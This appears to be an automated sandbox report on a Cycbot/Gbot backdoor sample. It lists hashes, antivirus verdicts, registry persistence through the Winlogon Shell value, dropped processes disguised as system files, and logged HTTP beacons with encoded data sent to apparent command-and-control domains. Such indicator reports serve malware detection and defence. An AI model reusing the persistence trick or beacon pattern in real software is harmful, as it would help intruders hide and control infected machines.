Analysis Date2015-01-17 13:28:38
MD5ddc6e875e35685c455ddd295a318f43b
SHA11c267368199d7607df719e0e1329bfbd7763a9bb

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 8f3819d1b283600ca67628eb0e596540 sha1: cc771e9371cd83fb88ac9ca4c1ff05effdcb4fc9 size: 118784
Section.rdata md5: a973043c2a7c573427803db06590e645 sha1: c3f33c2533a03c1533b5cf32ed4b113dea3d9af4 size: 1024
Section.data md5: bd8b4620f850e94dc53f9c8a34469d9f sha1: 2689b7640d7102772679de2703822f2f7398d1b9 size: 18944
Section.rsrc md5: c9772c48e2ba87cc67819e68072ad3b7 sha1: 073295b6b98fb7af735a27add7fed697114d19b8 size: 1024
Timestamp2005-11-13 07:14:49
VersionPrivateBuild: 1134
PEhash78b02c6c6cd5306b7c6215c8baa95c4358b9ff99
IMPhash1d695fe3f38bbce538ef3630022c86e3
AV360 Safeno_virus
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Trojan.Heur.KS.1
AVAuthentiumW32/Goolbot.C.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/FakeSpypro.B!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Diple-19
AVDr. WebTrojan.DownLoader1.44812
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.IVA
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.C.gen!Eldorado
AVF-SecureTrojan-Downloader:W32/Renos.GTC
AVGrisoft (avg)Agent.5.BJ
AVIkarusPacked.Win32.Krap
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.bs
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.e
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVRisingno_virus
AVSophosTroj/FakeAV-CDG
AVSymantecTrojan.Gen.2
AVTrend MicroBKDR_CYCBOT.SME
AVVirusBlokAda (vba32)Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNSdolbyaudiodevice.com
Winsock DNSzoneck.com
Winsock DNSwww.google.com
Winsock DNSmotherboardstest.com
Winsock DNS127.0.0.1
Winsock DNSzonejm.com
Winsock DNSpcdocpro.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNSpcdocpro.com
Type: A
209.59.161.20
DNSzonejm.com
Type: A
23.239.15.54
DNSwww.google.com
Type: A
173.194.37.80
DNSwww.google.com
Type: A
173.194.37.84
DNSwww.google.com
Type: A
173.194.37.83
DNSwww.google.com
Type: A
173.194.37.82
DNSwww.google.com
Type: A
173.194.37.81
DNSmotherboardstest.com
Type: A
204.11.56.45
DNSzoneck.com
Type: A
208.79.234.132
DNSxibudific.cn
Type: A
DNSdolbyaudiodevice.com
Type: A
HTTP GEThttp://pcdocpro.com/images/logo-1.jpg?tq=gHZutDyMv5rJeTXia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: gbot/2.3
HTTP GEThttp://zonejm.com/images/im133.jpg?tq=gJ4WK%2FSUh7zEhRMw9YLRsrCSUz6ow8a3nNQLabnVsMLElls0rNa1x7KTVjnaoLe2wecnKK7Ql6TH51MortCC5IaGUUmp19LyyZJqtUn5CGFIRQ%3D%3D
User-Agent: gbot/2.3
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://motherboardstest.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUz6ow8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GEThttp://zoneck.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUz6ow8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GEThttp://zoneck.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUp0OjbwvgS917V65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GEThttp://zonejm.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUp0OjbwvgS917V65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GEThttp://zonejm.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUp0OjbwvgS917X65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
Flows TCP192.168.1.1:1031 ➝ 209.59.161.20:80
Flows TCP192.168.1.1:1032 ➝ 23.239.15.54:80
Flows TCP192.168.1.1:1033 ➝ 173.194.37.80:80
Flows TCP192.168.1.1:1034 ➝ 173.194.37.80:80
Flows TCP192.168.1.1:1035 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1036 ➝ 208.79.234.132:80
Flows TCP192.168.1.1:1037 ➝ 208.79.234.132:80
Flows TCP192.168.1.1:1038 ➝ 23.239.15.54:80
Flows TCP192.168.1.1:1039 ➝ 23.239.15.54:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 6c6f676f   GET /images/logo
0x00000010 (00016)   2d312e6a 70673f74 713d6748 5a757444   -1.jpg?tq=gHZutD
0x00000020 (00032)   794d7635 724a6554 58696139 6e726d73   yMv5rJeTXia9nrms
0x00000030 (00048)   6c366769 577a2532 424a5a62 56794125   l6giWz%2BJZbVyA%
0x00000040 (00064)   33442048 5454502f 312e300d 0a436f6e   3D HTTP/1.0..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a207063 646f6370 726f2e63   Host: pcdocpro.c
0x00000070 (00112)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000080 (00128)   0a557365 722d4167 656e743a 2067626f   .User-Agent: gbo
0x00000090 (00144)   742f322e 330d0a0d 0a                  t/2.3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674a34 574b2532   3.jpg?tq=gJ4WK%2
0x00000020 (00032)   46535568 377a4568 524d7739 594c5273   FSUh7zEhRMw9YLRs
0x00000030 (00048)   72435355 7a366f77 3861336e 4e514c61   rCSUz6ow8a3nNQLa
0x00000040 (00064)   626e5673 4d4c456c 6c733072 4e613178   bnVsMLElls0rNa1x
0x00000050 (00080)   374b5456 6a6e616f 4c653277 65636e4b   7KTVjnaoLe2wecnK
0x00000060 (00096)   4b37516c 36544835 314d6f72 74434335   K7Ql6TH51MortCC5
0x00000070 (00112)   49614755 556d7031 394c7979 5a4a7174   IaGUUmp19LyyZJqt
0x00000080 (00128)   556e3543 47464952 51253344 25334420   Un5CGFIRQ%3D%3D 
0x00000090 (00144)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x000000a0 (00160)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000000b0 (00176)   743a207a 6f6e656a 6d2e636f 6d0d0a41   t: zonejm.com..A
0x000000c0 (00192)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000d0 (00208)   2d416765 6e743a20 67626f74 2f322e33   -Agent: gbot/2.3
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 6c733072 4e613178    */*....ls0rNa1x
0x00000050 (00080)   374b5456 6a6e616f 4c653277 65636e4b   7KTVjnaoLe2wecnK
0x00000060 (00096)   4b37516c 36544835 314d6f72 74434335   K7Ql6TH51MortCC5
0x00000070 (00112)   49614755 556d7031 394c7979 5a4a7174   IaGUUmp19LyyZJqt
0x00000080 (00128)   556e3543 47464952 51253344 25334420   Un5CGFIRQ%3D%3D 
0x00000090 (00144)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x000000a0 (00160)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000000b0 (00176)   743a207a 6f6e656a 6d2e636f 6d0d0a41   t: zonejm.com..A
0x000000c0 (00192)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000d0 (00208)   2d416765 6e743a20 67626f74 2f322e33   -Agent: gbot/2.3
0x000000e0 (00224)   f0                                    .

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 2e416363 6570743a    */*.....Accept:
0x00000050 (00080)   60                                    `

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   342e6a70 673f7471 3d674b34 514b2532   4.jpg?tq=gK4QK%2
0x00000020 (00032)   46535568 377a4574 524d7739 594c5273   FSUh7zEtRMw9YLRs
0x00000030 (00048)   72436955 7a366f77 3861336e 4f514c61   rCiUz6ow8a3nOQLa
0x00000040 (00064)   626e5673 4d4c4570 6c733072 4e613178   bnVsMLEpls0rNa1x
0x00000050 (00080)   374b6a56 6a6e616f 4c653277 64636e4b   7KjVjnaoLe2wdcnK
0x00000060 (00096)   4b375168 25324657 52343063 25324232   K7Qh%2FWR40c%2B2
0x00000070 (00112)   4e665338 736d6957 6f4e4a25 32425168   NfS8smiWoNJ%2BQh
0x00000080 (00128)   68534555 25334420 48545450 2f312e30   hSEU%3D HTTP/1.0
0x00000090 (00144)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000a0 (00160)   6f73650d 0a486f73 743a206d 6f746865   ose..Host: mothe
0x000000b0 (00176)   72626f61 72647374 6573742e 636f6d0d   rboardstest.com.
0x000000c0 (00192)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x000000d0 (00208)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000e0 (00224)   2e330d0a 0d0a                         .3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   342e6a70 673f7471 3d674b34 514b2532   4.jpg?tq=gK4QK%2
0x00000020 (00032)   46535568 377a4574 524d7739 594c5273   FSUh7zEtRMw9YLRs
0x00000030 (00048)   72436955 7a366f77 3861336e 4f514c61   rCiUz6ow8a3nOQLa
0x00000040 (00064)   626e5673 4d4c4570 6c733072 4e613178   bnVsMLEpls0rNa1x
0x00000050 (00080)   374b6a56 6a6e616f 4c653277 64636e4b   7KjVjnaoLe2wdcnK
0x00000060 (00096)   4b375168 25324657 52343063 25324232   K7Qh%2FWR40c%2B2
0x00000070 (00112)   4e665338 736d6957 6f4e4a25 32425168   NfS8smiWoNJ%2BQh
0x00000080 (00128)   68534555 25334420 48545450 2f312e30   hSEU%3D HTTP/1.0
0x00000090 (00144)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000a0 (00160)   6f73650d 0a486f73 743a207a 6f6e6563   ose..Host: zonec
0x000000b0 (00176)   6b2e636f 6d0d0a41 63636570 743a202a   k.com..Accept: *
0x000000c0 (00192)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000000d0 (00208)   67626f74 2f322e33 0d0a0d0a 6f742f32   gbot/2.3....ot/2
0x000000e0 (00224)   2e330d0a 0d0a                         .3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427655 70304f6a 62777667 53393137   fBvUp0OjbwvgS917
0x00000040 (00064)   56363572 4a716c4c 66675069 57573163   V65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 65636b2e 636f6d0d   ost: zoneck.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000a0 (00160)   2e330d0a 0d0a6f73 743a207a 6f6e6563   .3....ost: zonec
0x000000b0 (00176)   6b2e636f 6d0d0a41 63636570 743a202a   k.com..Accept: *
0x000000c0 (00192)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000000d0 (00208)   67626f74 2f322e33 0d0a0d0a 6f742f32   gbot/2.3....ot/2
0x000000e0 (00224)   2e330d0a 0d0a                         .3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427655 70304f6a 62777667 53393137   fBvUp0OjbwvgS917
0x00000040 (00064)   56363572 4a716c4c 66675069 57573163   V65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 656a6d2e 636f6d0d   ost: zonejm.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000a0 (00160)   2e330d0a 0d0a6f73 743a207a 6f6e6563   .3....ost: zonec
0x000000b0 (00176)   6b2e636f 6d0d0a41 63636570 743a202a   k.com..Accept: *
0x000000c0 (00192)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000000d0 (00208)   67626f74 2f322e33 0d0a0d0a 6f742f32   gbot/2.3....ot/2
0x000000e0 (00224)   2e330d0a 0d0a                         .3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427655 70304f6a 62777667 53393137   fBvUp0OjbwvgS917
0x00000040 (00064)   58363572 4a716c4c 66675069 57573163   X65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 656a6d2e 636f6d0d   ost: zonejm.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000a0 (00160)   2e330d0a 0d0a6f73 743a207a 6f6e6563   .3....ost: zonec
0x000000b0 (00176)   6b2e636f 6d0d0a41 63636570 743a202a   k.com..Accept: *
0x000000c0 (00192)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000000d0 (00208)   67626f74 2f322e33 0d0a0d0a 6f742f32   gbot/2.3....ot/2
0x000000e0 (00224)   2e330d0a 0d0a                         .3....


Strings
.b
.

040904b0
1134
B&reak
C&ompile
&Data
MS Sans Serif
PrivateBuild
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
3} /yMsQ]`0
.5GXDX
5l	L2v
5&XDX&X
6	w4{8
7cc2BoA
7MXeX[fX
7YIcWZ
8<LgXA
~9R!lPG
9vZ3Lb
+"/Ah|
#A!yFr@Sq0
B&S3`&
c<87X#<P;
-ccH>7fX`
CloseHandle
c,!o|GX<
CreateEventA
CreateSemaphoreA
CreateStdAccessibleObject
CreateThread
@.data
DeleteCriticalSection
dX5xu.
dX:eXFX
DXeX%X
dXFXeXZ
DXjgXA
DX+Zv|
}DX/zX
EnterCriticalSection
EnumResourceNamesA
eX7iZ#
*EX8WI
EX_;eX
.EXFXQ
,eXhhLoca
EX=I?eX
ExitProcess
]EXKwk|]
eXoGXQ
EX(;uA
EXW>%X
FindClose
FindFirstFileW
FreeEnvironmentStringsA
=)[?FX
FX6EX`
FXgX_S
FX*LJw
]fXO&Xa
FXUeX5
fX(_u%X
;^FXx3
fX'XfX
GetDriveTypeW
GetLastError
GetLocalTime
GetStartupInfoA
GetSystemTimeAsFileTime
GetThreadPriority
`g}N#t
^]GX;DX6
GX/fX{
GXfX,c
gXvDX*
HdXEXQ
HdXgXW
hhlFreh
hLoadh
HNc%X|
.\I6%X
InitializeCriticalSection
i.s>WV
i#vLFb
JcU~;r
JdX\TeX
jgX]EXZ
j:MfX!
J$X+EX
.ka-k20
KERNEL32.dll
kEX/DX<l
kfX$Xp
k-G|hyI"
]KJ%bN
&kPj/|
|K=&X#
LeaveCriticalSection
LoadLibraryA
L~++(Q
LresultFromObject
L?(&X8
M1F	Rq
m^DXFXR
mYeXgX,DX$X*
NcHHy-2
nEXkYvO
n,lXy3
o5<7y@
__"oc_
]OIqG?
-;OJ:gX2
OLEACC.dll
ow%XJ_i
o$XeXL
oX%X[&X
ozeXdX
p4@v&ADT
pE8un~>
q4vNjr 
`.rdata
ReadFile
ReleaseSemaphore
SetEndOfFile
SetEvent
SetFilePointer
>tDXk&Xc
!This program cannot be run in DOS mode.
ThlAllh
(Tj@h?[@
ucn)ZYh
udXl5w$X,6
<uM9_+
>uSMIGXEXU
uuNNdgX
u*x,(XA
V1<eMT
VdXfXC
V{.gXU
VMteXY
WaitForMultipleObjects
WaitForSingleObject
WkN$X%X
WriteFile
 WV_#Oo
X(+4gX
X5YGX9$X
X]6>)jWA
X[9/IT
$XdXdX
XdX,fX
XDXgXT
XDXT<B
XdXyl-L
$X.>eX
X:eXeX\
X\EX_EX
XEX[(FX
%XeXl 
XEXo<<u	
X\EX>p
XeXX_ 
X-eXy(
XFX.DXi
XFXdXs
XfX~GXMC
XfXmMm
XfXx$X
X];fXy#
XgXDX*!
XGXdX5
'XGXfX
X]gX;h]m
XGXT%X"
XgXUeX
X>GXUgX]
XGX&X<
Xh5nO<o
XHdXz/
XhXhhU
X<?^jB
XKdX9@
Xk-jDX
&XldX=
X}LfXX
$XL.%X
X~]~mb
$X_n=\
X<)NEX
Xn,y5\
XtDX'X
XT<fX]
XThLocah
X(;<TX
XT'X8a
XUk7GX
X?uN,FX5
&X)UxzdX
XUzI&X
$X|v4-
XV7I8B
XVGXGX
X)vjzk
X,vUu>
'Xv%X<P
XV*&XU]
%Xwhnc
XWw7gX"
X{%X5]
&X>&X=7
X&XDX^L
X'X	KNN?:ml
X{'Xl{
$X'XN53
XXnl*<\
X|'XoO
_$X'Xq
X[[%XQ
=%X$XR
X+&Xu(
X$XVMC
X%X-Xc
X$X%XdX
XyVO+GX+
Ycc2cc
yKgX(>&X
ynff(ic
Y/RXnE
YUdXo<
{Z7H=2
zDXGXI
zeXiw;9
ZugXTY
z'XfX*j